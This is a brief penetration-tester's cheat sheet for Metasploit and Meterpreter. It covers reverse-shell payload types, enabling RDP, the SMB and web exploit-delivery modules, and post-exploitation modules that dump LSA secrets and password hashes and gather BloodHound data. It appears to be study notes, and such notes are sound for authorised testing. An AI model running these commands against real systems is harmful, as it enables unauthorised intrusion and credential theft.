Resources

• Getsystem Explaination: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

• /etc/init.d/postgresql start

Payload Types

Unstaged

• windows/shell_reverse_tcp:The entire shell is in this code, and I can catch the callback with nc.

Staged

• windws/shell/reverse_tcp: I’d need to use Metasploits exploit/multi/handler to get the callback.

RDP Access from Meterpreter Shell

run getgui -e
shell

Useful Commands

#Load Powershell within meterpreter
load powershell

#Deliver exploit via SMB
use exploit/windows/smb/smb_delivery

#Deliver exploit via Web
use multi/script/web_delivery
set target 3

Windows Post-Exploitation

run post/windows/gather/lsa_secrets
run post/windows/gather/hashdump
run post/windows/gather/bloodhound

upload C:\\Users\\Admin\\file.ps1